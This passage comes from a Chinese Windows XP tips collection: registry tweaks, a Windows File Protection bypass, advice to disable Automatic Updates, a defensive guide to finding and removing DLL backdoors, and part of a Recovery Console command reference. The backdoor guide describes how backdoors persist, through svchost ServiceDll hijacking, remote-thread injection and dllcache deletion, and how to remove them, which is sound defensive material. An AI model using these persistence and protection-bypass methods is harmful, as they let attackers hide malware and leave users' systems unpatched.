启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoStartMenuEjectPC”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

不显示“我的计算机”

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum,移除{20D04FE0-3AEA-1069-A2D8-08002B30309D}便可。

不显示“计算机关机”选项

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoClose”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

以Administrator身份登入系统,到“开始”-->“运行”,输入gpedit.msc,点选窗口左边的“计算机配置”-->“系统管理模板”-->“[开始]菜单和工作列”,启用“移除及停用[计算机关机]按钮”。

移除“搜索”选项

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoFind”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

移除“说明及支持“项目

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoSMHelp”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

移除“运行“选项

启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoRun”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

隐藏“回收站“

方法:启动Regedit,到路径HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel,加入一个名为“{645FF040-5081-101B-9F08-00AA002F954E}”的DWORD值,将它设定为“1”。

修改“开始”menu显示

要修改 “开始”标题及menu显示,将要使用Resource Hacker来修改存放于C:\Windows资料夹内的Explorer.exe,由于这运行档受到Windows File Protection (WFP)功能保护,故必须先将其解除保护。

解除WFP保护方法:开启“档案总管”-->“Tools”à“Folder Options”-->“View”,取消 “Hide protected operating system files (recommend)”和“Hide extensions for known file types”,同时取消“Show hidden files and folders”。

然后到“开始”-->“运行”,输入“%systemroot%\system32\Restore”,应找到一个叫“filelist.xml”档案,点选再右按鼠标键选“内容 (Properties)”,取消“Read Only”一项。

开始正式修改filelist.xml,点鼠标右键,利用“记事本”开启档案,档案内容记录了所有受保护的重要档案。寻找“%windir%\system.ini”一行,加入“%systemroot%\explorer.exe”一行后存档。

到“开始”-->“运行”,输入“%systemroot%\system32\dllcache”,寻找并删除Explorer.exe,因为WFP功能一经运行后,系统会把某些指定的重要档案备份到这里。如果不把这档案删除,WFP功能运行例行检查时,发现Explorer曾经修改,便会实时将这个备份档取代刚修改的档案。

取消“自动更新”功能

Windows XP“自动更新”功能,自检发现有新的系统补丁便实时更新,虽然方便,但却占用一定的系统资源,倒不如自行手动更新更好,如果取消自动功能功能呢?方法如下:

到“控制台”-->“效能及维护”-->“系统”-->“自动更新”,选择“关闭自动更新,我要手动更新我的计算机”。另外,进入“开始”-->“运行”,运行msconfig在“服务”项目下取消“Automatic Updates”。

隐藏“网上邻居”

Windows XP要隐藏“网上邻居”,启动regedit,到路径HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,寻找一个叫“NoStartMenuNetworkPlaces”的DWORD值,若没有便新增一个,将设定值改为“1”便可。

找寻在“添加和删除程序”内隐藏的程序

不是所有已安装的程序都可透过“添加和删除程序”功能来反安装,但可通过修改一些参数来解决。例如Windows XP安装在C盘内,打开C:\Windows\inf资料夹,双击sysoc.inf文件,可看到有几行的倒数第二个单词是“Hide”。就是这个单词告诉系统不要把这个条目显示在“新增/移除程序”列表内,可使用空隔键来代替“Hide”便可显示所要的程序了 

《DLL后门清除完全篇》

 
DLL后门清除完全篇!
前言
  后门!相信这个词语对您来说一定不会陌生,它的危害不言而欲,但随着人们的安全意识逐步增强,又加上杀毒软件的“大力支持”,使传统的后门无法在隐藏自己,任何稍微有点计算机知识的人,都知道“查端口”“看进程”,以便发现一些“蛛丝马迹”。所以,后门的编写者及时调整了思路,把目光放到了动态链接程序库上,也就是说,把后门做成DLL文件,然后由某一个EXE做为载体,或者使用Rundll32.exe来启动,这样就不会有进程,不开端口等特点,也就实现了进程、端口的隐藏。本文以“DLL的原理”“DLL的清除”“DLL的防范”为主题,并展开论述,旨在能让大家对DLL后门“快速上手”,不在恐惧DLL后门。好了,进入我们的主题。
一,DLL的原理
1,动态链接程序库
  动态链接程序库,全称:Dynamic Link Library,简称:DLL,作用在于为应用程序提供扩展功能。应用程序想要调用DLL文件,需要跟其进行“动态链接”;从编程的角度,应用程序需要知道DLL文件导出的API函数方可调用。由此可见,DLL文件本身并不可以运行,需要应用程序调用。正因为DLL文件运行时必须插入到应用程序的内存模块当中,这就说明了:DLL文件无法删除。这是由于Windows内部机制造成的:正在运行的程序不能关闭。所以,DLL后门由此而生!
2,DLL后门原理及特点
  把一个实现了后门功能的代码写成一个DLL文件,然后插入到一个EXE文件当中,使其可以执行,这样就不需要占用进程,也就没有相对应的PID号,也就可以在任务管理器中隐藏。DLL文件本身和EXE文件相差不大,但必须使用程序(EXE)调用才能执行DLL文件。DLL文件的执行,需要EXE文件加载,但EXE想要加载DLL文件,需要知道一个DLL文件的入口函数(既DLL文件的导出函数),所以,根据DLL文件的编写标准:EXE必须执行DLL文件中的DLLMain()作为加载的条件(如同EXE的mian())。做DLL后门基本分为两种:1)把所有功能都在DLL文件中实现;2)把DLL做成一个启动文件,在需要的时候启动一个普通的EXE后门。
常见的编写方法:
  (1),只有一个DLL文件
  这类后门很简单,只把自己做成一个DLL文件,在注册表Run键值或其他可以被系统自动加载的地方,使用Rundll32.exe来自动启动。Rundll32.exe是什么?顾名思意,“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数,这样在进程当中,只会有Rundll32.exe,而不会有DLL后门的进程,这样,就实现了进程上的隐藏。如果看到系统中有多个Rundll32.exe,不必惊慌,这证明用Rundll32.exe启动了多少个的DLL文件。当然,这些Rundll32.exe执行的DLL文件是什么,我们都可以从系统自动加载的地方找到。
  现在,我来介绍一下Rundll32.exe这个文件,意思上边已经说过,功能就是以命令行的方式调用动态链接程序库。系统中还有一个Rundll.exe文件,他的意思是“执行16位的DLL文件”,这里要注意一下。在来看看Rundll32.exe使用的函数原型:
  Void CALLBACK FunctionName (
  HWND hwnd,
  HINSTANCE hinst,
  LPTSTR lpCmdLine,
  Int nCmdShow
  );
  其命令行下的使用方法为:Rundll32.exe DLLname,Functionname [Arguments]
  DLLname为需要执行的DLL文件名;Functionname为前边需要执行的DLL文件的具体引出函数;[Arguments]为引出函数的具体参数。
  (2),替换系统中的DLL文件
  这类后门就比上边的先进了一些,它把实现了后门功能的代码做成一个和系统匹配的DLL文件,并把原来的DLL文件改名。遇到应用程序请求原来的DLL文件时, DLL后门就启一个转发的作用,把“参数”传递给原来的DLL文件;如果遇到特殊的请求时(比如客户端),DLL后门就开始,启动并运行了。对于这类后门,把所有操作都在DLL文件中实现最为安全,但需要的编程知识也非常多,也非常不容易编写。所以,这类后门一般都是把DLL文件做成一个“启动”文件,在遇到特殊的情况下(比如客户端的请求),就启动一个普通的EXE后门;在客户端结束连接之后,把EXE后门停止,然后DLL文件进入“休息”状态,在下次客户端连接之前,都不会启动。但随着微软的“数字签名”和“文件恢复”的功能出台,这种后门已经逐步衰落。
  提示:
  在WINNTsystem32目录下,有一个dllcache文件夹,里边存放着众多DLL文件(也包括一些重要的EXE文件),在DLL文件被非法修改之后,系统就从这里来恢复被修改的DLL文件。如果要修改某个DLL文件,首先应该把dllcache目录下的同名DLL文件删除或更名,否则系统会自动恢复。
(3),动态嵌入式

 

  这才是DLL后门最常用的方法。其意义是将DLL文件嵌入到正在运行的系统进程当中。在Windows系统中,每个进程都有自己的私有内存空间,但还是有种种方法来进入其进程的私有内存空间,来实现动态嵌入式。由于系统的关键进程是不能终止的,所以这类后门非常隐蔽,查杀也非常困难。常见的动态嵌入式有:“挂接API”“全局钩子(HOOK)”“远程线程”等。
  远程线程技术指的是通过在一个进程中创建远程线程的方法来进入那个进程的内存地址空间。当EXE载体(或Rundll32.exe)在那个被插入的进程里创建了远程线程,并命令它执行某个DLL文件时,我们的DLL后门就挂上去执行了,这里不会产生新的进程,要想让DLL后门停止,只有让这个链接DLL后门的进程终止。但如果和某些系统的关键进程链接,那就不能终止了,如果你终止了系统进程,那Windows也随即被终止!!!
3,DLL后门的启动特性
  启动DLL后门的载体EXE是不可缺少的,也是非常重要的,它被称为:Loader。如果没有Loader,那我们的DLL后门如何启动呢?因此,一个好的DLL后门会尽力保护自己的Loader不被查杀。Loader的方式有很多,可以是为我们的DLL后门而专门编写的一个EXE文件;也可以是系统自带的Rundll32.exe,即使停止了Rundll32.exe,DLL后门的主体还是存在的。3721网络实名就是一个例子,虽然它并不是“真正”的后门。
二,DLL的清除
  本节以三款比较有名的DLL后门例,分别为“SvchostDLL.dll”“BITS.dll”“QoServer.dll”。详细讲解其手工清除方法。希望大家在看过这三款DLL后门的清除方法之后,能够举一反三,灵活运用,在不惧怕DLL后门。其实,手工清除DLL后门还是比较简单的,无非就是在注册表中做文章。具体怎么做,请看下文。


1,PortLess BackDoor
  这是一款功能非常强大的DLL后门程序,除了可以获得Local System权限的Shell之外,还支持如“检测克隆帐户”“安装终端服务”等一系列功能(具体可以参见程序帮助),适用Windows2000/xp/2003等系统。程序使用svchost.exe来启动,平常不开端口,可以进行反向连接(最大的特点哦),对于有防火墙的主机来说,这个功能在好不过了。
  在介绍清除方法之前,我们先来简单的介绍一下svchost.exe这个系统的关键服务:
  Svchost只是做为服务的宿主,本身并不实现什么功能,如果需要使用Svchost来启动服务,则某个服务是以DLL形式实现的,该DLL的载体Loader指向svchost,所以,在启动服务的时候由svchost调用该服务的DLL来实现启动的目的。使用svchost启动某个服务的DLL文件是由注册表中的参数来决定的,在需要启动服务的下边都有一个Parameters子键,其中的ServiceDll表明该服务由哪个DLL文件负责,并且这个DLL文件必须导出一个ServiceMain()函数,为处理服务任务提供支持。
  呵呵!看了上边的理论,是不是有点蒙(我都快睡着了),别着急,我们来看看具体的内容)。我们可以看到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRpcSs下的Parameters子键,其键值为%SystemRoot%system32rpcss.dll。这就说明:启动RpcSs服务时。Svchost调用WINNTsystem32目录下的rpcss.dll。
  这是注册表的HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost,里边存放着Svchost启动的组和组内的各个服务,其中netsvcs组的服务最多。要使用Svchost启动某个服务,则该服务名就会出现在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost下。这里有四种方法来实现:
  1, 添加一个新的组,在组里添加服务名
  2, 在现有组里添加服务名
  3, 直接使用现有组里的一个服务名,但是本机没有安装的服务
  4, 修改现有组里的现有服务,把它的ServiceDll指向自己的DLL后门
  我测试的PortLess BackDoor使用的第三种方法。
  好了,我想大家看完了上边的原理,一定可以想到我们清除PortLess BackDoor的方法了,对,就是在注册表的Svchost键下做文章。好,我们现在开始。
  注:由于本文只是介绍清除方法,使用方法在此略过。
  后门的Loader把SvchostDLL.dll插入Svchost进程当中,所以,我们先打开Windows优化大师中的Windows进程管理2.5,查看Svchost进程中的模块信息,SvchostDLL.dll已经插入到Svchost进程中了,在根据“直接使用现有组里的一个服务名,但是本机没有安装的服务”的提示,我们可以断定,在“管理工具”—“服务”中会有一项新的服务。证明了我的说法,此服务名称为:IPRIP,由Svchost启动,-k netsvcs表示此服务包含在netsvcs服务组中。
  我们把该服务停掉,然后打开注册表编辑器(开始—运行--regedit),来到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesIPRIP下,查看其Parameters子键)。Program键的键值SvcHostDLL.exe为后门的Loader;ServiceDll的键值C:WINNTsystem32svchostdll.dll为调用的DLL文件,这正是后门的DLL文件。现在我们删除IPRIP子键(或者用SC来删除),然后在来到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvchost下,编辑netsvcs服务组,把49 00 70 00 72 00 69 00 70 00 00 00删除,这里对应的就是IPRIP的服务名。然后退出,重启。重启之后删除WINNTsystem32目录下的后门文件即可。


2,BITS.dll
  这是榕哥的作品,也是DLL后门,和SvchostDLL.dll原理基本一样,不过这里使用的是上边介绍的第四种方法,即“修改现有组里的现有服务,把它的ServiceDll指向自己的DLL后门”。换句话说,该后门修改现有的某一个服务,把其原有服务的DLL指向自己(也就是BITS.dll),这样就达到了自动加载的目的;其次,该后门没有自己的Loader,而是使用系统自带的Rundll32.exe来加载。我们还是用Windows 进程管理2.5来查看,从图7中,我们可以看到bits.dll已经插入到Svchost进程当中。
  好,现在我们来看看具体的清除方法,由于该后门是修改现有服务,而我们并不知道具体是修改了哪个服务,所以,在注册表中搜索bits.dll,最后在HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRasAuto下搜索到了bits.dll,查看Parameters子键下的ServiceDll,其键值为C:WINNTsystem32bits.dll(如图8)。原来,该后门把RasAuto服务原来的DLL文件替换为bits.dll了,这样来实现自动加载。知道了原因就好办了,现在我们把ServiceDll的键值修改为RasAuto服务原有的DLL文件,即%SystemRoot%System32rasauto.dll,退出,重启。之后删除WINNTsystem32目录下的bits.dll即可。
3,NOIR--QUEEN
  NOIR--QUEEN(守护者)是一个DLL后门&木马程序,服务端以DLL文件的形式插入到系统的Lsass.exe进程里,由于Lsass.exe是系统的关键进程,所以不能终止。在来介绍清除方法之前,我先介绍一下Lsass.exe进程:
  这是一个本地的安全授权服务,并且它会为使用Winlogon服务的授权用户生成一个进程,如果授权是成功的,Lsass就会产生用户的进入令牌,令牌使用启动初始 的Shell。其他的由用户初始化的进程会继承这个令牌。
  从上边的介绍我们就可以看出Lsass对系统的重要性,那具体怎么清除呢?请看下文。
  后门在安装成功后,会在服务中添加一个名为QoSserver的服务,并把QoSserver.dll后门文件插入到Lsass进程当中,使其可以隐藏进程并自动启动(如图9)。现在我们打开注册表,来到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesQoSserver,直接删除QoSserver键,然后重启。重启之后,我们在来到服务列表中,会看到QoSserver服务还在,但没有启动,类别是自动,我们把他修改为“已禁用”;然后往上看,会发现一个服务名为AppCPI的服务,其可执行程序指向QoSserver.exe(原因后边我会说到),具体如图11所示。我们再次打开注册表,来到HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesAppCPI,删除AppCPI键,重启,再删除QoSserver,最后删除WINNTsystem32目录下的后门文件。
  本人和这个后门“搏斗”了3个多小时,重启N次。原因在于即使删除了QoSserver服务,后门还是在运行,而且服务列表中的QoSserver服务又“死灰复燃”。后来才知道原因:在我删除了QoSserver服务并重启之后,插入到Lsass进程当中的QoSserver.dll文件又恢复了QoSserver服务,并且生成了另外一个服务,即AppCPI,所以我们必须在到注册表中删除AppCPI服务才算是把该后门清除。由此可以看出,现在的后门的保护措施,真是一环扣环。
  注意:在删除QoSserver服务并重启之后,恢复的QoSserver的启动类别要修改为“已禁用”,否则即便删除了AppCPI服务,QoSserver服务又运行了。


三,DLL的防范
  看了上边的例子,我想大家对清除DLL后门的方法有了一定的了解,但在现实中,DLL后门并不会使用默认的文件名,所以你也就不能肯定是否中了DLL后门。对于DLL后门,system32目录下是个好地方,大多数后门也是如此,所以这里要非常注意。下面我来具体介绍一下怎么发现DLL后门,希望对大家有所帮助。
  1,安装好系统和所有的应用程序之后,备份system32目录下的EXE和DLL文件:打开CMD,来到WINNTsystem32目录下,执行:dir *.exe>exe.txt & dir *.dll>dll.txt,这样,就会把所有的EXE和DLL文件备份到exe.txt和dll.txt文件中;日后,如发现异常,可以使用相同的命令再次备份EXE和DLL文件(这里我们假设是exe0.txt和dll0.txt),并使用:fc exe.txt exe0.txt>exedll.txt & fc dll.txt dll0.txt>exedll.txt,其意思为使用FC命令比较两次的EXE文件和DLL文件,并将比较结果保存到exedll.txt文件中。通过这种方法,我们就可以发现多出来的EXE和DLL文件,并通过文件大小,创建时间来判断是否是DLL后门。
  2,使用内存/模块工具来查看进程调用的DLL文件,比如Windows优化大师中的Windows 进程管理 2.5。这样,可以发现进程到底调用了什么DLL文件,在结合上边用FC命令比较出来的结果,又能进一步来确定是否中了DLL后门。如果没有优化大师,可以使用TaskList,这个小工具也可以显示进程调用的DLL文件,而且还有源代码,方便修改。
  3,普通后门连接需要打开特定的端口,DLL后门也不例外,不管它怎么隐藏,连接的时候都需要打开端口。我们可以用netstat -an来查看所有TCP/UDP端口的连接,以发现非法连接。大家平时要对自己打开的端口心中有数,并对netstat -an中的state属性有所了解。当然,也可以使用Fport来显示端口对应的进程,这样,系统有什么不明的连接和端口,都可以尽收眼底。
  4,定期检查系统自动加载的地方,比如:注册表,Winstart.bat,Autoexec.bat,win.ini,system.ini,wininit.ini,Autorun.inf,Config.sys等。其次是对服务进行管理,对系统默认的服务要有所了解,在发现有问题的服务时,可以使用Windows 2000 Server Resource Kit中的SC来删除。以上这些地方都可以用来加载DLL后门的Loader,如果我们把DLL后门Loader删除了,试问?DLL后门还怎么运行?!
  通过使用上边的方法,我想大多数DLL后门都可以“现形”,如果我们平时多做一些备份,那对查找DLL后门会启到事半功倍的效果

 

《XP控制台教程》

Windows XP控制台教程

微软在Windows 2000和Windows XP中,提供了故障恢复控制台。它是微软推出的一种全新的控制模式,用于在安全模式和其他启动选项不起作用时修复系统。

 

故障恢复控制台的作用:可以启用或禁用服务、格式化驱动器、在本地驱动器上读写数据(包括被格式化为NTFS文件系统的驱动器)、重写硬盘的主引导记录(MBR)、重写分区引导记录、恢复启动菜单等等并执行许多其他管理的任务。如果需要通过从软盘或CD-ROM复制一个文件到硬盘来修复系统,故障恢复控制台将特别有用。

下面以大家用得比较多的Windows XP为例,一起看看怎么用它。 启动故障恢复控制台

  方法有两个,一是从安装光盘启动,二是从硬盘启动。

  插入Windows XP的安装光盘,并且在BIOS中设置为优先从CDROM启动,启动电脑以后,系统会自动进入Windows XP安装界面选项,按下“R”键选择第二项“要使用‘故障控制台’修复Windows XP安装,请按R。”系统自动登录到故障恢复控制台。

它会自动找到已经存在的系统及其安装目录并给予编号。此时提示,问你需要修复哪一个系统。这里只有一个,如果是多个,会把它们都显示出来的。

选择了要修复的系统的编号后,控制台会提示输入该系统的管理员密码。这个可千万不能忘记哦,否则将无法修复系统。

密码正确后,就真正进入了控制台,可以发号施令了。那么,不知道都有哪些可用的命令该怎么办呢?

答案是 HELP 命令。在控制台提示符下输入 HELP 回车。如图,可以看到控制台命令的第一页。看屏幕下方提示,按空格键后就可以显示下一页命令了。

但是知道了有啥命令,不会用怎么办呢?

答案仍然是 HELP 命令,只不过这次是在 HELP 命令后面跟上你想了解的命令就可以了。在此顺便讲几个比较常用的命令:

FIXBOOT 命令的使用格式的帮助,该命令用来修复分区引导扇区。

另一个常用命令:FIXMBR ,可以修复硬盘主引导记录。 还有BOOTCFG ,这个命令相对于 Windows2000 来说,是 WindowsXP 独有的,它可以修复启动菜单。

比较有用的命令还有 format,对于用 DISKPART 命令建立的新分区,可以用它来格式化为 NTFS 和 FAT32 格式。所以不要把它和 Win98 下的 Format 命令等同。

diskpart 命令,可显示出分区信息,并对分区操作。需要指出的是,很多人把它称为 FDISK,这是不对的。尽管它和 FDISK 的功能差不多,但它的适应性比 FDISK 要强,功能也更方便。比如,不必特别地去激活主分区,默认就是激活的。也不必在删除主分区以后才可以删除扩展分区,可以直接对逻辑驱动器操作。它还有直接对 NTFS 分区操作的好处,而这对初学者来说尤其重要。等等。


故障恢复控制台命令全攻略

第一部分:文件和目录操作命令

Attrib

  更改单个文件或目录的属性。该命令设置或删除指派给文件或目录的只读、系统、存档、隐藏以及压缩属性。
  含有下列参数的 attrib 命令仅当使用故障恢复控制台时才可用。含有不同参数的 attrib
命令可在命令提示符中使用。

  attrib [ +r|-r] [ +s|-s] [ +h|-h] [ +c|-c] [ [ drive:] [ path] filename]

  参数
  +r  设置只读属性。
  -r  清除只读属性。
  +s  设置系统属性。
  -s  清除系统属性。
  +h  设置隐藏属性。
  -h  清除隐藏属性。
  +c  设置压缩属性。
  -c  清除压缩属性。

  [ [ drive:] [ path] filename]

  指定要处理的目录或文件的位置和名称。可以一次只更改一个文件,也可以更改整个目录。

  注意:可以用一个命令更改一个文件或目录的多个属性。

  Batch

  执行在文本文件中指定的命令。batch 命令仅在使用故障恢复控制台时才可用。故障恢复控制台可以从安装 CD 中启动。

  batch input_file [ output_file]

  参数

  input_file :指定包含要执行的命令列表的文本文件。Input_file 可以由驱动器号和冒号、目录名、文件名或它们的组合构成。

  output_file :如果指定,则在命名文件中存储命令输出。如果没有指定,输出将显示在屏幕上。

  范例

  下例将执行批处理文件 C:\ Jobs\ Find.txt 并将输出存储在文件 C:\ Jobs\ Results.txt 中:

  batch c:\ jobs\ find.txt c:\ jobs\ results.txt

  注意:批处理文件不能包含嵌套的 batch 命令。

  Chdir (Cd)

  显示当前目录的名称,或更改当前的文件夹。   含有下列参数的 chdir 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chdir 命令。

  chdir [drive:] [path] [ ..]   或者  cd [drive:] [ path] [ ..]

  参数  无

  如果不带任何参数,chdir 将显示当前驱动器和文件夹的名称。只与驱动器号一起使用(例如 cd C:),chdir 将显示指定驱动器上的当前目录。

  [ drive:] [ path]

  指定要改到的驱动器(如果不是当前驱动器)和目录。

  [ ..]

  指明要改到父文件夹。在 chdir 和两个句点之间插入一个空格。

  注意    · Chdir 将空格视作分隔符。用引号将包含空格的目录名扩起来。例如:

    cd "driver cache"

   · Chdir 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。

  Copy

  将单个文件复制到其他位置。含有下列参数的 copy 命令仅在使用故障恢复控制台时才可用。

  可在命令提示符下使用带不同参数的 copy 命令。

  copy source [ destination]

  参数

  source :指定要被复制的文件的位置和名称。Source 可由驱动器号和冒号、目录名、文件名或组合所组成。

  destination :指定要复制到其中的文件或文件集的位置和名称。Destination 可以由驱动器号和冒号、文件夹名、文件名及组合而组成。

  注意

   · 源可以是可移动媒体、当前 Windows 安装的系统目录中的任何目录、驱动器的根目录、本地安装源或 Cmdcons 目录。
   · 目标可以是除可移动媒体以外的任何与源相同的位置。如果没有指定目标,则默认为
当前目录。
   · Windows 安装 CD 中的压缩文件在复制过程中解压缩。
   · Copy 不支持通配符。

  Delete (Del)

  删除单个文件。含有下列参数的 delete 或 del 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 delete 或 del 命令。

  delete [ drive:] [ path] filename  或者  del [ drive:] [ path] filename

  参数

  [ drive:] [ path] filename指定要删除的文件的位置和名称。

  注意

   · Delete 只适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。

  Dir

  显示目录中的文件和子目录列表。含有下列参数的 dir 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 dir 命令。   dir [ drive:] [ path] [ filename]

  参数

  [ drive:] [ path]

  指定要查看列表的驱动器和目录。

  [ filename]

  指定要查看列表的特定文件或一组文件。可以使用多个文件名。文件名可以用空格、逗号或分号隔开。可以在 filename 参数中使用通配符(?和 *)显示一组文件。

  Dir 还列出磁盘的卷标和序列号,以及所列文件的数目,累计大小和磁盘上剩余的可用空间(以字节计)。对于每个文件和子目录而言,dir 列出文件的扩展名、文件字节数、文件的最后修改日期和时间以及下列文件属性(如果可用):

  缩写 属性
   d  目录
   h  隐藏文件
   s  系统文件
   e  加密
   r  只读
   a  存档文件
   c  已压缩
   p  重新分析点

  注意:

  Dir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。

  Expand

  从压缩文件中提取文件。通过该命令可从 .cab 文件或压缩文件中提取驱动程序文件。

  含有下列参数的 expand 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 expand 命令。

  expand source [ /F:filespec}] [ destination] [ /d] [ /y]

  参数

  source :指定要展开的文件。如果源文件只包含一个文件,请使用该选项。source 可由驱动器号和冒号、目录名、文件名或组合所组成。不能使用通配符。

  /f:size :如果源文件包含多个文件,指定要提取的文件的名称。可以对要提取的文件使用通配符。

  destination :指定提取文件或每个单独文件的目标目录和(或)文件名。

  /d :列出 CAB 文件中包含的文件而不展开或提取。

  /y :在展开或提取文件时不出现覆盖提示。

  范例

  下例将从安装 CD 上的驱动程序 CAB 文件中提取 Msgame.sys 文件并将其复制到C:\ Windows\ System\ Drivers:

  expand d:\ i386\ driver.cab \ f:msgame.sys c:\ windows\ system\ drivers

  下例将展开压缩文件 Access.cp_:

  expand d:\ i386\ acces.cp_c:\ windows\ system32\ access.cpl

  下例将列出安装 CD 上的驱动程序 CAB 文件中的所有文件。

  expand /d d:\ i386\ driver.cab

  要点

   · 驱动程序 CAB 文件包含成千上万的文件,其中包括由 Windows 提供的大部分驱动程序。将所有文件从 CAB 文件展开到硬盘上需要花较长的时间和大量的磁盘空间。建议 仅从该文件中提取需要的文件。
注意
   · 如果没有指定目标,文件将被复制到当前目录。
   · 不能将软盘驱动器或 CD-ROM 等可移动媒体指定为目标。

  Mkdir (md)

  创建目录或子目录。含有下列参数的 mkdir 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 mkdir 命令。

  mkdir [ drive:] path  或者  md [ drive:] path

  参数

  drive: :指定要创建新目录的驱动器。

  path :指定新目录的名称和位置。不能使用通配符。

  注意

   · Mkdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。

  Rename (Ren)

  更改单个文件的名称。含有下列参数的 rename 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 rename 命令。

  rename [ drive:] [ path] filename1 filename2  或者  ren [ drive:] [ path] filename1 filename2

  参数

  [ drive:] [ path] filename1

  指定要重新命名的文件的位置和名称。不能使用通配符。

  filename2

  为文件指定新的名称。重新命名文件时不能指定新的驱动器或路径。   Rmdir (Rd)

  删除目录。含有下列参数的 rmdir 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 mdir 命令。

  rmdir [ drive:] path  或者  rd [ drive:] path

  参数

  [ drive:] path

  指定要删除的目录的位置和名称。不能使用通配符。

  注意

   · 目录必须为空否则命令失败。
   · Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。

  Type

  显示文本文件的内容。使用 type 或 more 命令查看文本文件而不修改文件。含有下述参数的 type 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 type命令。

  type [ drive:] [ path] filename  或者  more [ drive:] [ path] filename

  参数

  [ drive:] path] filename

  指定要查看的文件的位置和名称。如果使用 NTFS 驱动器而且文件名包含空格,则必须用引号 (")将文件名引起来。

  More

  显示文本文件的内容。使用 more 或 type 命令查看文本文件而不修改文件。含有下列参数的 more 命令仅在使用故障恢复控制台时可用。可在命令提示符下使用带不同参数的 more命令。

  more [ drive:] [ path] filename  或者  type [ drive:] [ path] filename

  参数

  [ drive:] path] filename

  指定要查看的文件的位置和名称。

  如果使用 NTFS 驱动器,而且文件名包含空格,则必须用引号 (")将文件名引起来。

第二部分:系统和磁盘操作命令

Bootcfg

  bootcfg 命令启动配置和故障恢复(对于大多数计算机,即 boot.ini 文件)。

  含有下列参数的 bootcfg 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 bootcfg 命令。

  用法:

  bootcfg /default  设置默认引导项。

  bootcfg /add    向引导列表中添加 Windows 安装。

  bootcfg /rebuild  重复全部 Windows 安装过程并允许用户选择要添加的内容。

  注意:使用 bootcfg /rebuild 之前,应先通过 bootcfg /copy 命令备份 boot.ini 文件。

  bootcfg /scan    扫描用于 Windows 安装的所有磁盘并显示结果。

  注意:这些结果被静态存储,并用于本次会话。如果在本次会话期间磁盘配置发生变化,为获得更新的扫描,必须先重新启动计算机,然后再次扫描磁盘。

  bootcfg /list   列出引导列表中已有的条目。   bootcfg /disableredirect 在启动引导程序中禁用重定向。

  bootcfg /redirect [ PortBaudRrate] |[ useBiosSettings]

  在启动引导程序中通过指定配置启用重定向。

  范例:

  bootcfg /redirect com1 115200
  bootcfg /redirect useBiosSettings

  hkdsk

  创建并显示磁盘的状态报告。Chkdsk 命令还可列出并纠正磁盘上的错误。

  含有下列参数的 chkdsk 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chkdsk 命令。

  vol [drive:] [ chkdsk [drive:] [/p] [/r]

  参数  无

  如果不带任何参数,chkdsk 将显示当前驱动器中的磁盘状态。

  drive: 指定要 chkdsk 检查的驱动器。
  /p   即使驱动器不在 chkdsk 的检查范围内,也执行彻底检查。该参数不对驱动器做任何更改。
  /r   找到坏扇区并恢复可读取的信息。隐含着 /p 参数。

  注意

  · Chkdsk 命令需要 Autochk.exe 文件。如果不能在启动目录(默认为\ %systemroot%\ System32)中找到该文件,将试着在 Windows 安装 CD 中找到它。如果有多引导系统的计算机,必须保证是在包含 Windows 的驱动器上使用该命令。   Diskpart

  创建和删除硬盘驱动器上的分区。diskpart 命令仅在使用故障恢复控制台时才可用。

  diskpart [ /add |/delete] [device_name |drive_name |partition_name] [size]

  参数 无

  如果不带任何参数,diskpart 命令将启动 diskpart 的 Windows 字符模式版本。

  /add :创建新的分区。

  /delete :删除现有分区。

  device_name :要创建或删除分区的设备。设备名称可从 map 命令的输出获得。例如,设备名称:
  \ Device\ HardDisk0

  drive_name :以驱动器号表示的待删除分区。仅与 /delete 同时使用。以下是驱动器名称的范例:
  D:

  partition_name

  以分区名称表示的待删除分区。可代替 drive_name 使用。仅与 /delete 同时使用。以下是分区名称的范例:

  \ Device\ HardDisk0\ Partition1

   大小

